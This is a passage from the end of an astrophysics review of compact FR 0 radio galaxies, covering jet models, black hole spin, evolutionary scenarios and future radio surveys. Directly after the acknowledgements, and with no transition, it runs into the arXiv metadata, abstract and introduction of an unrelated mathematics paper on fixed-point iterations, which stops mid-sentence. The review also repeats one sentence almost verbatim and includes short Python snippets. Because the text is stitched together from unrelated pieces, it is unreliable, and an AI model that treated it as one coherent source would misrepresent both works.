gas in RGs (Balmaverde et al., 2019; Torresi et al., 2022) possibly rule out the presence of a statistical difference between FR II LERGs and HERGs, weakening the evolution scenario and, instead, suggesting that jet properties in powerful FR IIs do not depend on the accretion mode or the disc structure (Capetti et al., 2023). The connection between FR 0s and FR II LERGs is established by their common affinity with FR Is, since they all share a LERG optical spectrum and are generally interpreted to be jet-dominated RGs powered by a RIAF disc. In fact, Baldi et al. (2018) envisaged that FR 0s, FR Is and FR II LERGs belong to a single continuous population, with similar BH mass, galaxy and accretion properties, regardless of their different jet morphologies. Differences related to intrinsic BH properties (spin and magnetic field at its horizon, and marginally different BH mass) shape the whole LERG population (Miraghaei and Best, 2017; Grandi et al., 2021): when these parameters are maximized, highly relativistic jets are launched and form full-fledged FR I/FR II LERGs, while FR 0s would originate from less extreme values of these parameters (see Baldi et al. 2018 and Sect. 12 for discussion).

## 12 Models for FR 0s

Here we will discuss two possible scenarios to account for the multi-band results on FR 0s, in which the jet and nuclear properties of FR 0s either 1) are intrinsically different from those of the other FR classes and do not evolve, or 2) evolve within the context of the RLAGN population, with FR 0s representing a particular phase of this evolution.
### Static scenarios

In a non-evolutionary scenario, where the intrinsic properties of the FR 0 class remain unchanged across their lifetime, we will review the main features which can determine the accretion and ejection in FR 0s in relation to FR Is. Magneto-hydrodynamic simulations of jet launching (e.g. McKinney and Gammie 2004; Hawley and Krolik 2006; McKinney 2006; Tchekhovskoy et al. 2011) predict the formation of a light, relativistic outflow powered by the rotational energy of the BH, as described in the work of Blandford and Znajek (1977) (BZ), as well as of a heavier and mildly relativistic outflow powered by the accretion disc, as originally proposed by Blandford and Payne (1982) (BP). LERGs, which are jet-dominated sources, are generally interpreted as BZ powered, while HERGs, which have quasar-type discs, are generally interpreted as powered by both BZ and BP, given the presence of both relativistic jets and strong outflows (Heckman and Best, 2014). FR 0s as well as FR Is are expected to launch BZ jets (with a possible contribution from a BP process for the outer jet layer in case of a stratified jet, see below). For RLAGN jets generated by a BZ-type process in RIAF discs (Tchekhovskoy et al., 2011; Liska et al., 2022), the ratio of jet and accretion powers (jet efficiency) is maximum when the BH is both rapidly spinning and has accumulated a substantial amount of large-scale poloidal magnetic flux by accretion (see e.g. Komissarov 2001; Tchekhovskoy et al. 2010). The BZ jet power does not directly depend on the accretion rate, but the outflowing plasma is surely a fraction of the accreting flow. As discussed in Sect. 8, although they can share similar accretion rates, core-dominated RGs and FR 0s show a lower jet efficiency than the more powerful FR Is. The small fraction of plasma within the disc that is actually channeled into the jet could justify the paucity of matter to accelerate to relativistic speeds in the FR 0 jets. The BZ jet power depends on \(M_{\rm BH}\), the magnetic field strength \(B\) threading the BH and the magnitude of its spin \(\bar{a}\) (Chen et al., 2021). In Newtonian physics, in a ballistic model, the jet height is proportional to the ratio of initial speed to gravity. Since the gravity is proportional to the BH mass and the initial jet speed is set by the BZ process as \(\sim E_{\rm kin}^{1/2}\), with \(E_{\rm kin}\propto\bar{a}^{2}M_{\rm BH}^{2}B^{2}\), the maximum jet length is \(\sim\bar{a}B\). This mathematical approximation suggests that the limited length of FR 0 jets could, in fact, depend on spin and magnetic field.

**BH mass** \(M_{\rm BH}\), the mass of the central compact object, is often used as an indicator of BH activity, as AGN are preferentially associated with massive systems (e.g., Chiaberge and Marconi, 2011). The jet power roughly establishes the likelihood of the source being radio-jet dominated (Cattaneo and Best, 2009). Kinetic jet power and BH masses are connected in active radio nuclei, as AGN tend to become more radio powerful (i.e. more radio loud) at larger BH masses (e.g. Best et al., 2005). Furthermore, the \(L_{\rm mech}\)-\(M_{\rm BH}\) relation mirrors the mass dependence of the accretion rate estimated with the Bondi accretion flow expected from the hot hydrostatic gas halos surrounding the galaxies (e.g. Allen et al., 2006; Balmaverde et al., 2008). The slightly smaller BH masses of FR 0s can constitute a limit on the jet power, but cannot simply justify the substantial lack of extended jet emission.
**Magnetic field**, \(B\), plays a primary role in the processes of jet formation, acceleration, and collimation (e.g. Blandford and Znajek, 1977; Blandford and Payne, 1982; Nakamura et al., 2001; Lovelace et al., 2002). Its azimuthal and poloidal components, originating from the rotation of the accretion disc and BH, are required to form and then hold the jet, which extracts angular momentum from the disc surface by torque. The magnetic field integrated over the BH horizon sets the jet power. The magnetic flux paradigm of Sikora and Begelman (2013) suggests that the radio loudness is determined by the deposition of magnetic flux close to the BH, which occurs more efficiently during the hot RIAF-type (ADAF) phase and facilitates the jet launching. In fact, as a counter-example stressing the important role of \(B\) in jet production, the low magnetic field strength measured with VLBI in the radio-intermediate quasar III Zw 2 has possibly determined its failure to develop a powerful jet (Chamani et al., 2021). The amount of magnetic flux accumulation and the geometry of the external field can differentiate between powerful and weak RGs, including FR 0s (O'Sullivan et al., 2015; Grandi et al., 2021). Moderate jet activity, as in FR 0s, can also be triggered by the dissipation of turbulent fields in accretion disc coronae (Balbus and Hawley, 1991; Brandenburg et al., 1995). In conclusion, a low intensity of the magnetic field structure of FR 0s represents a plausible scenario to describe their limited jet capabilities, although there is still no clear evidence for it.

**BH spin**, \(\bar{a}\), is the primary ingredient in separating the formation of different jets: the spin paradigm for AGN (Sikora et al., 2007; Garofalo et al., 2010) is a phenomenological scale-invariant framework based on BH-disc parameters for understanding BH feeding, feedback and jet launching mechanisms across the BH mass scale. This model, also named the gap paradigm, involves the physics of energy extraction from the BH via the BZ effect, and the extraction of accretion disc rotational energy via BP jets and disc winds (Pringle, 1981; Kuncic and Bicknell, 2004, 2007). The total outflow power (BZ jet, BP jet, disc wind) is based on the size of the gap region between the BH event horizon and the disc. The BH spin still mediates the launching of the jet and determines the upper bound on the radio loudness (Sikora et al., 2007). Retrograde and prograde BH spin configurations, with the accreting material rotating opposite or parallel to the direction of the BH spin, determine the size of the gap region and thus the jet power: high retrograde BH spins yield greater jet powers, while slowly spinning prograde BHs yield weak jets (Garofalo, 2009). The latter scenario would fit the FR 0 class. Recently, in the framework of the BZ jet model, it has been found that the measured poloidal jet magnetic flux \(\phi_{\rm jet}\) threading a BH (Narayan et al., 2003; Tchekhovskoy et al., 2011; McKinney et al., 2012; Yuan and Narayan, 2014) correlates over seven orders of magnitude with the disc luminosity for a sample of aligned and misaligned RLAGN, in the form \(\phi_{\rm jet}\sim L_{\rm Bol}^{1/2}M_{\rm BH}\) (Zamaninasab et al., 2014), as predicted by a MAD model. This relation suggests that the magnetic field, twisted by the rotation of the BH, which powers the BZ jets, dominates the plasma dynamics of the MAD disc, prevents the gas infall, and slows down the rotation by removing angular momentum through the collimated relativistic outflow.
Although we cannot directly measure the magnetic flux at the BH horizon, \(\phi_{\rm BH}\), this quantity is the same as \(\phi_{\rm jet}\) under the flux-freezing approximation for BZ jets. Assuming that \(\phi_{\rm jet}\) is set by the BZ mechanism, \(\phi_{\rm jet}\sim L_{\rm jet}^{1/2}\bar{a}^{-1}M_{\rm BH}^{-1}\), and using the empirical relation from Zamaninasab et al. (2014), we can derive a rough estimate of the BH spin as \(\bar{a}\sim L_{\rm Mech}^{1/2}M_{\rm BH}^{-2}L_{\rm Bol}^{-1/2}\), by deriving accretion and jet power, respectively, from the [O III] and radio luminosities (Eq. 3). This approximate calculation, performed for the FR0CAT and FRICAT, leads to the conclusion that FR 0s have, on average, a BH spin smaller than that of FR Is by a factor of 0.7\(\pm\)0.3. A similar result is obtained if the BH spin is estimated by using the empirical correlation with jet power (Narayan and McClintock, 2012). The smaller BH spin of FR 0s would translate into a lower bulk Lorentz factor \(\Gamma\) than those of FR Is, as suggested by Baldi et al. (2015, 2019). The maximisation of the BH parameters (M\({}_{\rm BH}\), B, \(\bar{a}\)) would lead to high-\(\Gamma\) jets with a FR I/II morphology. This is in line with theoretical works which suggest a link between BH spin and jet speeds (e.g. Thorne et al. 1986; Meier 1999; Maraschi et al. 2012; Chai et al. 2012). While an initial disc-jet magnetization is needed, high spins are possibly required to launch the most relativistic jets; however, observational evidence for the connection between BH spin and the jet is controversial, and RQAGN with high spins have been observed (Reynolds, 2014), breaking the one-to-one correspondence between high BH spins and the presence of jets. However, the lower BH spin of FR 0s would certainly contribute to the lower jet bulk speeds, observed in the form of a lower jet sidedness than that of FR Is. To reconcile the common pc-scale \(L_{\rm core}\)-\(L_{\rm Bol}\) luminosity correlation valid for FR 0s and FR Is with the lower jet sidedness of FR 0s, their lack of kpc-scale emission and their putative \(\gamma\)-ray emission, the invoked (static, but valid also for a dynamic scenario) jet model for FR 0s is the well-known (stratified jet) "two-flow model" (Sol et al., 1989): an outer jet layer with a mildly relativistic velocity (\(v\sim 0.5c\)) surrounds an inner electron-positron jet spine, which moves at much higher relativistic speeds (bulk Lorentz factor \(\sim 10\)). The existence of two flows at different velocities provides a good agreement with both theoretical and observational constraints on RGs in general (Ghisellini et al., 2005). This model can provide a simple way to solve the discrepancy between the high Lorentz factors required to produce the observed \(\gamma\)-ray emission and the slower observed motion in jets at pc scales (Cheng and An, 2018; Chen et al., 2021). Based on this model, the inner beam of FR 0 jets is slower than that of FR Is. Similarly to what happens in FR I jets (Bicknell, 1984, 1995; Bowman et al., 1996; Laing and Bridle, 2014; Perucho et al., 2014), the jet spine of FR 0s could decelerate on kpc scales to sub-relativistic speeds due to entrainment of external material. As suggested by the similar Mpc-scale environment, the unification of the FR 0s and weak BL Lacs in a single class of RGs, characterised by a fainter and slower spine than that of FR Is, finds support from recent results which identify a large number of BL Lacs showing 'non classical' blazar-like properties and analogies with FR 0s (e.g.
As suggested by the similar Mpc-scale environment, the unification of FR 0s and weak BL Lacs in a single class of RGs, characterised by a fainter and slower spine than that of FR Is, finds support from recent results which identify a large number of BL Lacs showing 'non-classical' blazar-like properties and analogies with FR 0s (e.g. Liuzzo et al. 2013; Massaro et al. 2017; D'Ammando et al. 2018). Another parameter which can play a role in two-flow model jets for FR 0s is the prominence of one of the two components over the other. In fact, the picture of FR I jets as decelerating flows with transverse velocity gradients and with intrinsic emissivity (prominence) differences between the spine and the sheath (a slow-moving boundary layer being more prominent than faster material near the centre, Komissarov 1990) finds observational support in resolved jet structures of individual sources (e.g., 3C 84, Giovannini et al. 2018; Cen A, Janssen et al. 2021). Similarly, in FR 0s, the large loss of radio emission from pc-scale structure with respect to the arcsec-scale cores indicates that the jet emissivity does not remain constant and the sheath emission dominates over the spine emission, which is hardly seen, even if boosted, with VLBI observations. In addition, an intrinsically weak spine and a brighter slower shear, supported by BZ and BP processes respectively, could account for the possible loss of jet stability through entrainment of the galaxy medium. On kpc scales the spine dies out, dragging the layer to disruption. Another advantage of a sheath-dominated jet is the formation of relativistic shocks at the interface between the two flows moving at different speeds, which can accelerate particles along the shock front and produce \(\gamma\)-ray emission by inverse Compton scattering (Wang et al., 2023). This would justify the \(\gamma\)-ray detection of FR 0 candidates (Baldi et al., 2019). Another parameter which takes part in shaping the jet structure is the composition, which is one of the major uncertainties in AGN physics. In powerful RGs, protons (or a huge Poynting flux with a very low particle content) are needed in the spine to support the jet kinetic energy (De Young, 2006). Conversely, pure leptonic pair (electron/positron) jets are excluded, because the jet would be slowed down by Compton interactions. Croston et al. (2018) suggested that FR Is are likely dominated by hadrons (mostly protons) and FR IIs are dominated by leptons; FR 0 jets could then be lighter than FR I/II jets, with a smaller hadronic component. This scenario would reduce the necessity for very high bulk \(\Gamma\) factors for FR 0 jets and consequently would probably favour their jet instability while crossing the host galaxy. ### Dynamic scenarios The inclusion of a temporal variation of the accretion-ejection parameters across the RG lifetime span can better reproduce the different observed classes of RLAGN. The tracks in Fig. 18, based on parametric modeling, present the expected evolutionary routes of a radio source that begins as a CSO and successfully evolves into a FR I or FR II under conditions of long-duration AGN activity. If this standard evolutionary scenario is also applicable to the FR 0s and we consider FR 0s as progenitors of FR Is, FR 0s would correspond to the population of the low-power (\(P_{\rm 1.4\,GHz}<10^{24}\,\rm W\,Hz^{-1}\)) CSOs in their earliest evolutionary phase. Instead, the VLBI-resolved FR 0s with pc-scale jets may shift their position horizontally in the \(P\)-\(D\) diagram into the region of MSOs. According to the evolutionary model of FR 0s into low-power FR Is proposed by An and Baan (2012), it is necessary for the jet structure to remain preserved before breaking out of the host galaxy and for the AGN activity to last longer than \(10^{4}\) yr.
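As a back-of-the-envelope check on that timescale, the sketch below computes how long a jet head needs to cross the inner host galaxy for a few assumed advance speeds; the speeds and the \(\sim\)1 kpc scale are illustrative choices, not values from An and Baan (2012).

```python
KPC_M = 3.086e19      # metres per kiloparsec
C_MS = 2.998e8        # speed of light, m/s
YR_S = 3.156e7        # seconds per year

def crossing_time_yr(distance_kpc, beta):
    """Time (yr) for a jet head advancing at beta*c to cover distance_kpc."""
    return distance_kpc * KPC_M / (beta * C_MS) / YR_S

for beta in (0.5, 0.1, 0.01):             # assumed jet-head advance speeds
    print(f"beta = {beta:4.2f} -> t(1 kpc) ~ {crossing_time_yr(1.0, beta):,.0f} yr")
```

Only a head advancing at an appreciable fraction of \(c\) clears the inner kiloparsec within \(\sim 10^{4}\) yr, which illustrates why slow, easily decelerated FR 0 jets need longer-lived activity (and an intact structure) to break out of the host.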
However, due to their low radio power and susceptibility to jet fragmentation, only a small fraction of FR 0s would be capable of evolving beyond a few tens of kpc and becoming low-power FR Is. Furthermore, the much larger space density of FR 0s with respect to FR Is clearly clashes with the picture of all FR 0s as young FR Is; necessarily, not all RL CRSs may be destined to evolve into double RGs (Fanti et al., 1990, 1995). In fact, a uniform distribution of total lifetimes of RLAGN in the range 0-1000 Myr, estimated from low-frequency radio data, reproduces well the distributions of projected linear sizes of the powerful sources, \(10^{25}\lesssim L_{\rm 150\,MHz}\lesssim 10^{27}\,\rm W\,Hz^{-1}\), but diverges from the expectations for the large number of compact/small sources at lower luminosities, even when surface-brightness selection effects are taken into account (Hardcastle et al., 2019). To break this tension, the presence of RLAGN populations with distinct lifetime distributions or accretion-ejection mechanisms (e.g., FR 0 vs FR I/II) needs to be considered. A possible scenario to resolve the problem of the large abundance of compact RGs concerns an intermittent AGN activity. Baldi et al. (2018) stated that a radio activity recurrence, with the duration of the active phase covering a wide range of values and with short active periods of a few thousand years being strongly favoured over longer ones, might account for the large number density of FR 0s. This would explain why their jets do not develop at large scales (Sadler et al., 2014). An occasional fueling of the central BH can significantly reduce the accretion rate and cause a discontinuous plasma injection in the jet and its possible rapid deceleration and instability within the galaxy. Particular conditions of magnetic field loops, which trap gas and grow magnetic instabilities, could lead to stimulated BH activity (Czerny et al., 2009; Yuan and Narayan, 2014; Inayoshi et al., 2020). An 'aborted' jet scenario was invoked by Ghisellini et al. (2004) to account for the jetted RQAGN where the BH fails to eject an extended relativistic particle jet, if the central engine works intermittently. According to this model, a small difference in BH masses, as seen between FR Is and FR 0s, could play a role in aborting the nascent extended jets. Gopal-Krishna et al. (2008) suggested that the jet phenomenon may depend on the BH mass through the amount of gas tidally stripped from stars by the central BH, which could truncate the jets in the BH vicinity due to mass loading from the stellar debris. In addition, there is recent evidence that some compact sources, possibly a fraction of the FR 0 population, are turning off/fading (e.g., Kunert-Bajraszewska et al., 2005, 2006; Giroletti et al., 2005; Orienti et al., 2010) and short-lived due to accretion-related criticality (e.g. Czerny et al., 2009; Kunert-Bajraszewska et al., 2010; An and Baan, 2012; Kiehlmann et al., 2023). However, there is still no observational proof of a different nuclear gas distribution between FR 0s and FR Is, which might lead to intermittent BH feeding or jet frustration in the former, as opposed to the long-lasting secular accretion and ejection of the latter (Balmaverde et al., 2006). Figure 18: Radio power vs. source size (\(P\)–\(D\) diagram) of RGs, adapted from Cheng and An (2018) with data taken from An and Baan (2012).
Black squares are CSOs, black circles are low-power GPSs, red diamonds are high-power GPSs, purple crosses are HFPs, green circles are low-power CSSs, blue open triangles are high-power CSSs, blue filled triangles are FR IIs, and green filled stars are FR Is. A further morphological sub-classification is also considered that distinguishes among CSO (\(<\) 1 kpc), MSO (1–15 kpc), and large symmetric objects (LSO; \(>\) 15 kpc, FR I/IIs) (Readhead, 1995). Red and blue dashed lines are illustrative of the evolutionary tracks based on parametric modeling for the high-power and low-power sources, respectively. The pc-scale FR 0s (red filled circles) studied by Cheng and An (2018) are situated in the bottom-left corner, occupied by low-power CSOs and some compact low-power MSOs. A temporal evolution of the BH spin within the gap paradigm predicts a FR 0 as a specific phase of a continuous activity in the family of RLAGN (Garofalo et al., 2010). As the gap region reduces in size with BH spin, the BZ/BP jet decreases in power. Instead, continuous mass accretion spins the BH up towards the angular momentum value of the accretion flow. An evolution of the BH spin configuration with the disc angular momentum can reduce or increase the gap region and change the BH spin magnitude. This dynamic process can accommodate the formation of a FR 0 population within two different scenarios: an accretion-driven or a merger-driven one. In a scenario where the BH spin depends on the accretion history of the system, the gap paradigm has been applied to FR 0s as low-spinning, prograde BHs whose progenitors are powerful FR II quasars (Garofalo and Singh, 2019) (Fig. 19). In gas-rich mergers, powerful (FR II) HERGs emerge from a BH accreting in a cold mode, surrounded by a thin REAF disc with retrograde accretion. Due to the powerful jet feedback, the disc moves into a RIAF disc on a timescale of about a few million years. The continuous accretion across the duty cycles will spin down the BHs, moving the system to lower luminosities with a FR II jet, as the retrograde BH spin approaches zero (LERGs). As the BH spin moves to a prograde regime, the BZ-jet power increases as the spin increases. In this low-spin regime, the jet is weaker than in the FR II stage and tends to level off in a stable state. In this region of BH-jet parameter space, FR 0s find their location, where weak, compact jets are found. As the system keeps on feeding the low-spinning prograde BH, the FR 0 moves to a full-fledged FR I once the spin grows sufficiently above 0.2, which requires the BH to accumulate about 30% of its original mass. The large abundance of FR 0s with respect to the other FR classes can also be interpreted as a result of the limited gas availability in nearby ETGs. The paucity of gas in the FR 0 (small- and large-scale) environments slows down the transition from FR 0s to FR Is because of the low accretion rates. Therefore FR 0s are not young sources, but they are the result of a prolonged slow accretion of prograde low-spinning massive BHs over timescales of hundreds of millions to billions of years. One-sixth of this population succeeds in funnelling sufficient fuel to the BH and ultimately turns into a FR I. The poorer Mpc-scale environment of FR 0s and the slightly smaller BH masses (galaxy masses) than those of FR Is are the two main pieces of evidence for a different cosmological evolution of FR 0s with respect to that of FR Is. Therefore, FR 0s are predicted to grow both in small groups (primarily) and in rich clusters.
Figure 19: Focus on the temporal evolution of RGs according to the gap paradigm from high-powered FR II HERGs to FR I LERGs in an accretion-driven scenario. FR 0s represent a stage of this evolution, as prograde low-spinning BHs. \(a\) is the BH spin, the black thick and the blue curved arrows represent the BZ and BP jets, the blue oval and the red line represent the ADAF and the REAF discs, while the gray arrow in the REAF disc represents the disc wind, which is absent in ADAF states. Image reproduced with permission from Garofalo and Singh (2019), copyright by AAS. In a merger-driven scenario, major mergers are known to be the main mechanism for spinning up BHs (Martinez-Sansigre and Rawlings, 2011; Bustamante and Springel, 2019). Since such objects are the result of BH–BH coalescence events, galaxies with higher masses are more likely to have undergone more mergers and therefore to host high-spinning BHs. The simulations performed by Dubois et al. (2014) indicate that indeed the most massive BHs (\(\mathrm{M_{BH}}\gtrsim 10^{8}\,M_{\odot}\)), in particular those associated with gas-poor galaxies, acquire most of their mass through BH coalescence. In a poor environment, major mergers of galaxies with similar masses are rare, limiting the formation of highly spinning BHs. Although the large-scale environment seems to introduce some difference in the BH spin distribution, the nature of the connection between environment and BH spin is still under debate, because opposite results have also been found (e.g. Smethurst et al. 2019; Beckmann et al. 2023). However, in the standard picture, this merger-driven scenario would agree with the observational result that FR 0s and FR Is live in different environments. Consequently, in this scenario, a positive link between local galaxy density, BH parameters (mass and spin), and accretion rate is set. The poorer neighborhood of FR 0s, on a statistical basis, determines a longer phase of lower BH spin than for their FR I counterparts, which live in richer environments. FR 0s in clusters of galaxies have likely formed recently and have not yet accreted a sufficient amount of mass onto their central BH to turn into a FR I. Conversely, rare FR Is in poor groups have likely undergone particular conditions (magnetic field, gas availability, reciprocal galaxy velocity, position in the cluster/group), which have led to an acceleration of their evolution from a FR 0 stage or to a different duty cycle. However, the physical process which controls the connection between large-scale environment (Mpc scale) and the BH accretion (Bondi radius, tens to hundreds of pc) still remains to be understood, and there is currently limited observational evidence to support the two proposed scenarios. In the nearby Universe, \(\sim\)70-80% of the RLAGN phase is spent in a compact-jet configuration. Given that \(\sim\)30% of the most massive galaxies are active and the activity must be constantly re-triggered so that the galaxy spends over a quarter of its time in an active state (Best et al., 2005a), the FR 0 phase is an important stage of the evolution of an ETG, where their galactic-scale jets are continuously operating in maintenance mode. The large excess of RL CRSs over what would be expected from models in which all sources live to the same age (i.e.
constant age models), particularly evident at lower radio luminosities (Shabala et al., 2008; Hardcastle et al., 2019; Shabala et al., 2020), suggests that the actual process of FR 0 evolution is longer than the phase spent as FR I and FR II. Assuming a monotonic jet expansion, the limited size of FR 0s would point to irregular duty cycles, where shorter active phases occur more often than longer ones (Baldi et al., 2018, 2019a). However, this would conflict with the LOFAR result that the most massive galaxies are always switched on at some level at \(L_{150\,{\rm MHz}}\gtrsim 10^{21}\,{\rm W\,Hz}^{-1}\) (Sabater et al., 2019). Therefore, the large uncertainties on the origin and nature of FR 0 jets, and on the role of environmental and internal conditions in setting the duration of the compact phase, complicate the estimate of the duty cycle of FR 0s. ## 13 Conclusions and future perspective The BH accretion-ejection mechanism provides a major power source in the Universe and is believed to regulate the evolution of galaxies by injecting energy and momentum. However, the details of how and when this occurs remain uncertain, particularly at low luminosities, where the majority of active BHs are expected. There is compelling evidence, supported by numerical simulations, that low-luminosity RGs channel the bulk of their accretion power into compact and galactic-scale jets (\(\sim\)1-10 kpc) which may have a significant impact on their hosts, regulating the SF, because they plough energy into the ISM more efficiently than powerful jets. Yet, a poor characterization of the jet physics and the AGN-host connection at low luminosities hampers our comprehension of the accretion-ejection paradigm, feedback and hence galaxy evolution. The cross-correlation of high-sensitivity radio and optical surveys showed that the vast majority of local RGs (\(\sim\)80%) appear unresolved on arcsecond scales and shed light on a 'new' class of low-luminosity RGs, _FR 0s_, which lack kpc-scale extended radio emission. This review of recent results on the multi-band properties of FR 0s has collected enough evidence to conclude that FR 0s constitute a unique class of CRSs, which _can_ launch pc-scale jets with mildly relativistic bulk speeds, probably due to small (prograde) BH spins or lower magnetic fields in the BH vicinity. To solve the long-lasting question about the large abundance of RL CRSs with respect to what is expected from standard RG evolution models, the puzzling nature of FR 0s and their impact on BH-galaxy evolution, an accurate census of the accretion-jet properties is needed with the following characteristics: i) a statistically complete sample to include all galaxy and AGN diversity to explore the role of each physical parameter that controls the accretion-ejection and feedback processes; ii) in the radio band, because long-baseline radio arrays can isolate the low-brightness nuclear emission far better than any other instruments at higher energies; iii) at luminosities as low as possible to probe the very end of the luminosity functions, ideally down to the Sgr A* luminosity (\(\sim\)\(10^{15.5}\) W Hz\({}^{-1}\)); iv) in the local Universe to enable pc-scale spatial resolution to disentangle the relative AGN-SF contribution and probe small jet structures.
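A quick numerical illustration of requirement (iv): the sketch below converts angular resolution into projected linear scale using the simple low-redshift approximation \(d\simeq cz/H_{0}\); the redshifts, beam sizes and \(H_{0}\) value are illustrative assumptions, not numbers taken from this review.

```python
import numpy as np

H0 = 70.0                                    # assumed Hubble constant, km/s/Mpc
C_KMS = 2.998e5                              # speed of light, km/s
MAS_RAD = np.pi / (180.0 * 3600.0 * 1e3)     # radians per milliarcsecond

def linear_scale_pc(z, theta_mas):
    """Projected size (pc) subtended by theta_mas at low redshift z (d ~ cz/H0)."""
    d_pc = (C_KMS * z / H0) * 1.0e6          # Hubble-law distance in pc
    return d_pc * theta_mas * MAS_RAD

for z in (0.01, 0.05):                       # illustrative local redshifts
    for theta in (1.0, 50.0, 1000.0):        # VLBI beam, e-MERLIN-like beam, ~1 arcsec
        print(f"z = {z:4.2f}, theta = {theta:7.1f} mas -> {linear_scale_pc(z, theta):8.1f} pc")
```

At these distances milliarcsecond baselines resolve pc-scale jet structures, while an arcsecond beam blends everything within roughly a kiloparsec, which is why only the local Universe allows the AGN and SF contributions to be separated and small jets to be probed.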
The current and upcoming generation of radio arrays and surveys done with these facilities, LOFAR (Best and The LOFAR-UK Consortium, 2008; Shimwell et al., 2019; Hardcastle and Croston, 2020) and the International LOFAR Telescope (Morabito et al., 2022b, a), ASKAP (Norris et al., 2011; Riggi et al., 2021), MeerKAT (Jarvis et al., 2016; Heywood et al., 2022), SKA (Falcke et al., 2004; Kapinska et al., 2015), ngVLA (Nyland et al., 2018a, b), uGMRT (Gupta et al., 2017; Lal et al., 2021), DSA-2000 (Hallinan et al., 2021) and other radio antennae (e.g. ALMA, WSRT), will provide the cornerstone of our understanding of BH activity in the local Universe at low luminosities, across a wide range of galaxy types and environments. Because of their sub-arcsecond resolution and \(\mu\)Jy-level sensitivity, they will uncover the bulk population of CRSs, opening a new window onto the physical properties of FR 0s. For example, within the wide sky coverage of the LOFAR observations, the census of nearby active BHs at 150 MHz will count \(\sim\)3000 LLAGN with luminosities \(<10^{40}\) erg s\({}^{-1}\) at \(z<0.03\) (Sabater et al., 2019). The next step will come with the advent of the SKA and ngVLA, which will survey vast numbers of nearby galaxies with unprecedented sensitivities at sub-arcsecond resolutions over a large range of radio frequencies (reaching \(\sim\)1 \(\mu\)Jy at \(<\)1 GHz over 30 deg\({}^{2}\) will detect \(\sim\)300,000 LLAGN; Prandoni and Seymour 2015; Padovani 2016). A multi-band cross-match with other surveys at higher frequencies (optical, X-ray) will trace a demography of local low-power jetted BHs and their interplay with galaxies, providing firmer constraints on models of accretion-ejection coupling in ordinary AGN (not quasar type) (Prandoni and Seymour, 2014, 2015). Low-frequency (\(<\)1 GHz) radio surveys with SKA precursors (e.g. ASKAP, MWA), LOFAR and GMRT are already extremely valuable for studying the putative extended emission of FR 0s, because it remains crudely true that the observed duty cycle of AGN increases with decreasing frequency: this is because of the longer synchrotron lifetimes of the lower-energy relativistic particles at lower frequencies. Deep sub-arcsecond International LOFAR Telescope observations could reveal the true extent of the penetration of FR 0 jets into the galaxy, by discovering synchrotron-aged plasma from past injection events. This would lead to a better characterization of the physical properties, duty cycles and kinetic power of FR 0 jets. Combining hundred-MHz information with GHz observations can help to characterise the spectral shape of FR 0s, to infer the fraction of optically thin, hence extended, emission present in FR 0 jets and eventually isolate the fraction of genuine young radio sources erroneously included in this class. High-resolution radio observations with long-baseline arrays (e.g. eMERLIN, EVN, VLBA) are crucial to establish the fraction of jetted FR 0s on pc scales and derive the jet asymmetry and velocity distribution. With those ideas in mind, future research on FR 0s will address the following key topics:
* **Pc-scale accretion-ejection.** The origin of the inability of such a large population to grow kpc-scale jets is still a mystery. The separation of the genuine population of FR 0s with respect to other compact impostors (star-forming galaxies, RQAGN, young RGs, blazars) is fundamental to identify the crucial aspects which can diagnose their jet limitations.
Accretion and ejection studied with non-radio high-resolution data (e.g. Chandra, eROSITA, JWST, VLT, ELT) can help to disentangle the different contributions within the RL CRS population and to constrain models of discs and jets.
* **High energy.** Several FR 0s have so far been detected as \(\gamma\)-ray emitters and are expected to be multi-messenger sources. It is important to continue the search for \(\gamma\)-ray emission from RL CRSs and LLAGN in general to study particle acceleration mechanisms at low powers.
* **AGN feedback.** Several studies point to the result that RL CRSs can exert a more efficient feedback on their host galaxies than powerful extended RGs. A single studied case of a FR 0 driving turbulence and creating cavities in the X-ray atmosphere of a cluster is not sufficient to derive robust results on the effect of the low-power jets of FR 0s on the surrounding medium. Systematic studies with deep multi-band data, combined with VLBI observations, will provide a unique data set for advancing our comprehension of the interaction of FR 0s with their environments.
* **High redshifts.** There is evidence that the local FR 0 population has an important counterpart also at higher redshifts (\(z>1\)). A systematic study of the genuine FR 0s at cosmic noon from deep fields would help to understand the formation and cosmic evolution of low-power RLAGN with respect to the other classes of RGs.
* **Numerical simulations.** High-resolution 3D numerical simulations of low-power jets (total jet power \(<10^{44}\,\mathrm{erg\,s^{-1}}\)) can help to clarify the formation, propagation and impact of FR 0 jets on the galactic medium.
###### Acknowledgements. I am very grateful to friends and colleagues who provided thoughtful comments on the manuscript, especially A. Capetti, who helped me through fruitful discussions and inspired this review, and M. Brienza, G. Giovannini, P. Grandi, G. Migliori, and E. Torresi, who triggered a productive discussion on FR 0s. I thank L. Ferretti for offering me this wonderful opportunity to write this review and the anonymous referees for constructive comments and suggestions that greatly helped improve the manuscript. R.D.B. acknowledges financial support from INAF mini-grant "FR0 radio galaxies" (Bando Ricerca Fondamentale INAF 2022). This research has made use of NASA's Astrophysics Data System Bibliographic Services. This research has made use of the NASA/IPAC Extragalactic Database (NED), which is funded by the National Aeronautics and Space Administration and operated by the California Institute of Technology. The author has no conflicts of interest to declare. I certify that the submission is original work and is not under review at any other publication.
2304.09537
Global Convergence of Algorithms Based on Unions of Nonexpansive Maps
In his recent research M. K. Tam (2018) considered a framework for the analysis of iterative algorithms which can be described in terms of a structured set-valued operator. At each point in the ambient space, the value of the operator can be expressed as a finite union of values of single-valued paracontracting operators. He showed that the associated fixed point iteration is locally convergent around strong fixed points. This result generalizes a theorem due to Bauschke and Noll (2014). In the present paper we generalize the result of Tam and show the global convergence of his algorithm for an arbitrary starting point. An analogous result is also proved for the Krasnosel'ski-Mann iterations.
Alexander J. Zaslavski
2023-04-19T10:04:41Z
http://arxiv.org/abs/2304.09537v1
# Global Convergence of Algorithms Based on Unions of Nonexpansive Maps ###### Abstract In his recent research M. K. Tam (2018) considered a framework for the analysis of iterative algorithms which can be described in terms of a structured set-valued operator. At each point in the ambient space, the value of the operator can be expressed as a finite union of values of single-valued paracontracting operators. He showed that the associated fixed point iteration is locally convergent around strong fixed points. This result generalizes a theorem due to Bauschke and Noll (2014). In the present paper we generalize the result of Tam and show the global convergence of his algorithm for an arbitrary starting point. An analogous result is also proved for the Krasnosel'ski-Mann iterations. Keywords:Convergence analysis Fixed point Nonexpansive mapping Paracontracting operator Mathematics Subject Classification (2010): 47H04 47H10 ## 1 Introduction For more than sixty years now, there has been a lot of research activity in the study of the fixed point theory of nonexpansive operators [1; 8; 10; 11; 12; 13; 14; 15; 18; 19]. The starting point of this study is Banach's celebrated theorem [2] concerning the existence of a unique fixed point for a strict contraction. It also concerns the convergence of 